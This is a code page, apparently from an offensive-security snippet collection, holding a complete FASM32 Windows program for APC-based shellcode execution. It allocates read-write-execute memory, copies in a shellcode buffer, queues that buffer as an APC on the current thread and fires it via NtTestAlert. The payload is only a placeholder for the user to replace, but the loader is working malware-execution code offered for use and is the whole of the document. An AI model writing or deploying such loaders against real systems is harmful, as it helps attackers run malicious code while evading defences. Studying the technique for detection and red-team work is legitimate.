(FASM32) APC injection by Jean-Pierre LESUEUR (DarkCoderSc)

Created the Wednesday 22 May 2024. Updated 4 weeks, 1 day ago.

Code

            format PE GUI 4.0
entry main

include 'win32w.inc'

section '.code' readable executable

; **************************************************
; * Code
main:
        ; VirtualAlloc()
        xor eax, eax                                   ; NULL
        push PAGE_EXECUTE_READWRITE                    ; VirtualAlloc.flProtect
        push MEM_COMMIT or MEM_RESERVE                 ; VirtualAlloc.flAllocationType
        push [shellcode_length]                        ; VirtualAlloc.dwSize
        push eax                                       ; VirtualAlloc.lpAddress
        call [VirtualAlloc]
        test eax, eax
        jz exit

        ; Copy Shellcode to Allocated Memory Region
        mov edi, eax                                    ; Destination
        mov esi, shellcode                              ; Source
        mov ecx, [shellcode_length]                     ; Count
        rep movsb                                       ; Copy
        mov esi, eax                                    ; eax eq destination

        ; GetCurrentThread()
        call [GetCurrentThread]
        mov ebx, eax

        ; QueueUserAPC()
        xor eax, eax
        push eax                                        ; QueueUserAPC.dwData
        push ebx                                        ; QueueUserAPC.hThread (Current Thread)
        push esi                                        ; QueueUserAPC.pfnAPC (Copied Shellcode)
        call [QueueUserAPC]
        test eax, eax
        jz exit

        ; NtTestAlert()
        call [NtTestAlert]
exit:
        ; ExitProcess()
        xor eax, eax
        inc eax                                         ; ExitCode = 1
        push eax                                        ; ExitProcess.uExitCode
        call [ExitProcess]


; **************************************************
; * Data
section '.data' data readable

; Replace with your own shellcode
shellcode               db      0xcc, 0x90, 0x90, 0x90, 0x90

shellcode_length        dd      $ - shellcode

; **************************************************
; * Imports
section '.idata' import data readable

library kernel32, 'KERNEL32.dll',\
        ntdll, 'NTDLL.DLL'

import kernel32,\
       ExitProcess, 'ExitProcess',\
       GetCurrentThread, 'GetCurrentThread',\
       QueueUserAPC, 'QueueUserAPC',\
       VirtualAlloc, 'VirtualAlloc'

import ntdll,\
       NtTestAlert, 'NtTestAlert'